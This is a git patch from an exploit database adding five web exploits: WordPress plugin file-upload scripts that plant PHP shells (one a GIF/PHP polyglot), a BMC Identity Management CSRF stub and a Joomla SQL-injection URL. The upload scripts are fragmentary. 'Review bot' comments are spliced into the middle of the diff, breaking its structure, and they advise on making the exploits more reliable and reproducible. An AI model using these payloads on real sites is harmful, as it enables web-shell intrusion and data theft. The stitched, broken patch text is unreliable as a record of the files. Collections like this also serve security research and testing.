From 441db36a16d6cd7f50444b4d95ed803e7cbbac8d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 26 Jun 2015 05:02:53 +0000
Subject: [PATCH] DB: 2015-06-26 5 new exploits
---
files.csv | 5 +++++
platforms/java/webapps/37372.html | 7 +++++++
platforms/php/webapps/37370.php | 31 +++++++++++++++++++++++++++++
platforms/php/webapps/37371.php | 33 +++++++++++++++++++++++++++++++
platforms/php/webapps/37373.php | 22 +++++++++++++++++++++
platforms/php/webapps/37374.txt | 7 +++++++
6 files changed, 105 insertions(+)
create mode 100755 platforms/java/webapps/37372.html
create mode 100755 platforms/php/webapps/37370.php
create mode 100755 platforms/php/webapps/37371.php
create mode 100755 platforms/php/webapps/37373.php
create mode 100755 platforms/php/webapps/37374.txt
diff --git a/files.csv b/files.csv
index 627ac1d6e..f7c555ef1 100755
--- a/files.csv
+++ b/files.csv
@@ -33723,3 +33723,8 @@ id,file,description,date,author,platform,type,port
 37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
 37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0
+37370,platforms/php/webapps/37370.php,"WordPress FCChat Widget Plugin 2.2.x 'Upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
+37371,platforms/php/webapps/37371.php,"WordPress Picturesurf Gallery Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-03,"Sammy FORGIT",php,webapps,0
+37372,platforms/java/webapps/37372.html,"BMC Identity Management Cross Site Request Forgery Vulnerability",2012-06-11,"Travis Lee",java,webapps,0
+37373,platforms/php/webapps/37373.php,"WordPress Contus Video Gallery Plugin 'upload1.php' Arbitrary File Upload Vulnerability",2012-06-12,"Sammy FORGIT",php,webapps,0
+37374,platforms/php/webapps/37374.txt,"Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Vulnerability",2012-06-10,xDarkSton3x,php,webapps,0
diff --git a/platforms/java/webapps/37372.html b/platforms/java/webapps/37372.html
new file mode 100755
index 000000000..23aff5419
--- /dev/null
+++ b/platforms/java/webapps/37372.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53924/info
+
+Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
+
+Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
+
+BMC IDM Change PW CSRF PoC
\ No newline at end of file
diff --git a/platforms/php/webapps/37370.php b/platforms/php/webapps/37370.php
new file mode 100755
index 000000000..277fe1e47
--- /dev/null
+++ b/platforms/php/webapps/37370.php
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/53855/info
+
+WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable.
+
+"@$uploadfile",
+ 'Submit'=>'submit'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access :
+http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif
+
+lo.php.gif
+
\ No newline at end of file
diff --git a/platforms/php/webapps/37371.php b/platforms/php/webapps/37371.php
new file mode 100755
index 000000000..72887930c
--- /dev/null
+++ b/platforms/php/webapps/37371.php
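Review bot: The write-up never states which BMC Identity Management versions are affected or which request the PoC forges; only the generic BID text and the title `BMC IDM Change PW CSRF PoC` are present in this rendering, so the form markup may have been stripped from view. Because the entry is catalogued as an exploit rather than an advisory, the file should carry a one-line header such as `<!-- Affected: BMC Identity Management <version>; forged request: <method> <change-password path>, no anti-CSRF token -->` filled in from the original advisory. If the original file does contain the auto-submitting form, that header still lets a reader triage the PoC without loading it in a browser.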
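Review bot: `$postResult = curl_exec($ch);` is never checked before `curl_close($ch);`, so a connection or TLS failure prints an empty string and the tester cannot tell a failed request from a silent upload; add `if ($postResult === false) { die('curl: ' . curl_error($ch) . "\n"); }` immediately before `curl_close($ch);`. The `curl_init`/`CURLOPT_POSTFIELDS` setup that should precede `"@$uploadfile",` is not visible in this hunk (everything from `<?php` to the `=>` appears to have been dropped), so the target URL and the `$uploadfile` assignment could not be reviewed. The "Shell Access" URL ends in `1_lo.php.gif`, so the shell only runs where the server executes a `.php.gif` double extension; the write-up should state that precondition so a 200 with image bytes is not mistaken for a failed upload. Minor style point: `www.exemple.com` differs from the `www.example.com` placeholder used by 37374.txt in the same commit.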
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/53894/info
+
+Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
+
+PostShell.php
+"@$uploadfile",
+'is_simple'=>'is_simple'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Shell Access :
+http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
+
+lo.php.gif
+GIF89a???????????!??????,???????D?;?
+
\ No newline at end of file
diff --git a/platforms/php/webapps/37373.php b/platforms/php/webapps/37373.php
new file mode 100755
index 000000000..34d9e1bd0
--- /dev/null
+++ b/platforms/php/webapps/37373.php
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/53931/info
+
+WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected.
+
+"@$uploadfile",
+ 'mode'=>'image'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
diff --git a/platforms/php/webapps/37374.txt b/platforms/php/webapps/37374.txt
new file mode 100755
index 000000000..81f252ede
--- /dev/null
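Review bot: The "Shell Access" URL `.../data/upload/lo.php.gif` together with the `GIF89a` header line shows the payload is an image/PHP polyglot, but nothing says that code execution depends on the web server honouring the inner `.php` extension; on a server that types files only by their final extension the upload is served as an image and the PoC looks like a false negative. A comment above the URL such as `# needs the server to execute .php.gif (multi-extension handling); otherwise only the arbitrary write is confirmed` would make that precondition explicit. The result of `curl_exec($ch)` is printed without checking; `if ($postResult === false) die('curl: ' . curl_error($ch));` placed before `curl_close($ch);` surfaces transport failures. The setup before `"@$uploadfile",` (the `$uploadfile` assignment and the `upload.php` target URL) is not visible in this hunk and could not be reviewed.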
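Review bot: This PoC ends at `?>` with no "Shell Access" line, so after the POST to `upload1.php` succeeds a reader has no way to locate the uploaded file; unless the response echoed by `print "$postResult";` contains the stored path (not verifiable here), the write-up should add the resulting URL of the uploaded file as the other two upload entries in this commit do. `'mode'=>'image'` is the only request field visible, and the `$uploadfile`/target setup before `"@$uploadfile",` is not in this hunk. As a minimal robustness fix, `if ($postResult === false) die('curl: ' . curl_error($ch));` before `curl_close($ch);` distinguishes a transport failure from an empty server response.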
+++ b/platforms/php/webapps/37374.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53942/info
+
+The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_alphacontent§ion=weblinks&Itemid=1&lang=de&limitstart=[sqli]
\ No newline at end of file
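Review bot: The PoC URL reads `com_alphacontent§ion=weblinks`, which looks like `&section=weblinks` mangled by decoding `&sect` as the `§` entity; copied as-is the request never carries a `section` parameter, so the line should read `http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli]`. The entry also states no affected Alphacontent version and gives no hint of how the injection surfaces (error, boolean or union), so a one-line note on what `[sqli]` was verified with would make the finding reproducible. If `limitstart` is used as a numeric offset, the injection point is presumably unquoted; that is worth stating rather than leaving the reader to guess at the payload shape.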